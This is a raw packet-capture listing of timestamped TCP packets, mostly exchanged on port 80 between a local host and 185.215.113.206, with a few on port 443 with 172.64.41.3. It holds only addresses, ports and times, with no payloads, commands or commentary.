Nov 12, 2024 00:06:27.567830086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567833900 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.567842007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567852974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567859888 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.567864895 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567876101 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567886114 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.567888021 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567902088 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.567903042 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567917109 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567929029 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567929983 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.567946911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567959070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567960978 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.567971945 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567981958 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.567985058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.567996979 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568003893 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568008900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568017960 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568020105 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568046093 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568073034 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568093061 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568104982 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568115950 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568126917 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568135977 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568140030 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568151951 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568161964 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568166018 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568175077 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568186998 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568187952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568202019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568207979 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568219900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568228006 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568233967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568245888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568257093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568259954 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568269014 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568279982 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568280935 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568289042 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568293095 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568308115 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568320036 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568320036 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568334103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568346024 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568348885 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568360090 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568371058 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568371058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568389893 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568391085 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568403959 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568413973 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568414927 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568425894 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568444967 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568455935 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568485975 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568577051 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568593979 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568604946 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568615913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568619013 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568629026 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568639040 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568640947 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568651915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568664074 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568664074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568675995 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568679094 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568689108 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568700075 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568700075 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568716049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568727970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568741083 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568748951 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568758965 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568768024 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568782091 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568785906 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568793058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568794966 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568804026 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568813086 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568816900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568825960 CET	443	49849	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.568829060 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568830967 CET	443	49850	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.568833113 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568840981 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568842888 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568854094 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568865061 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568866014 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568876982 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568896055 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568907976 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568913937 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568927050 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568928957 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568938017 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568938017 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568949938 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568960905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568969011 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.568973064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.568991899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569000006 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569003105 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569015980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569015980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569030046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569039106 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569041967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569060087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569067001 CET	49850	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:27.569075108 CET	443	49850	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.569082022 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569092989 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569097042 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569104910 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569122076 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569128990 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569147110 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569149971 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569159031 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569165945 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569171906 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569184065 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569190979 CET	49849	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:27.569190979 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569195986 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569204092 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569211960 CET	443	49849	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.569214106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569226027 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569232941 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569232941 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569237947 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569250107 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569262028 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569267035 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569279909 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569281101 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569292068 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569304943 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569305897 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569317102 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569329023 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569330931 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569343090 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569354057 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569355965 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569367886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569380045 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569380045 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569396019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569402933 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569416046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569420099 CET	443	49850	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.569427967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569428921 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569441080 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569453001 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569462061 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569464922 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569477081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569483042 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569488049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569500923 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569500923 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569513083 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569516897 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569526911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569539070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569545031 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569550037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569565058 CET	443	49849	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.569575071 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569586992 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569595098 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569598913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569611073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569633961 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569659948 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569689035 CET	49850	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:27.569757938 CET	443	49850	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.569819927 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569835901 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569847107 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569858074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569863081 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569870949 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569878101 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569884062 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569895983 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569906950 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569914103 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569926977 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569928885 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569938898 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569951057 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569951057 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569968939 CET	49849	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:27.569972992 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569984913 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.569984913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.569998980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570010900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570013046 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570023060 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570033073 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570036888 CET	49850	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:27.570039034 CET	443	49849	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.570050001 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570055008 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570064068 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570075035 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570082903 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570086002 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570097923 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570108891 CET	49849	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:27.570110083 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570108891 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570122004 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570123911 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570133924 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570146084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570151091 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570156097 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570168018 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570178986 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570187092 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570194006 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570199966 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570213079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570219994 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570226908 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570235968 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570240021 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570254087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570261955 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570266962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570277929 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570281982 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570295095 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570307016 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570318937 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570319891 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570331097 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570341110 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570343018 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570353031 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570363045 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570365906 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570374012 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570385933 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570385933 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570399046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570410967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570419073 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570429087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570439100 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570441961 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570447922 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570455074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570466042 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570477962 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570507050 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570532084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570544958 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570555925 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570566893 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570579052 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570584059 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570591927 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570604086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570611954 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570631981 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570647001 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570658922 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570661068 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570671082 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570682049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570684910 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570684910 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570693970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570694923 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570707083 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570714951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570722103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570733070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570740938 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570750952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570755959 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570770025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570781946 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570785999 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570794106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570806026 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.570806980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570806980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570817947 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570831060 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570847988 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.570990086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571002007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571012974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571026087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571043015 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.571072102 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.571111917 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571124077 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571135044 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571146965 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571157932 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.571158886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571167946 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.571171045 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571187019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571199894 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.571208000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571219921 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.571219921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571232080 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.571240902 CET	49758	80	192.168.2.5	185.215.113.206
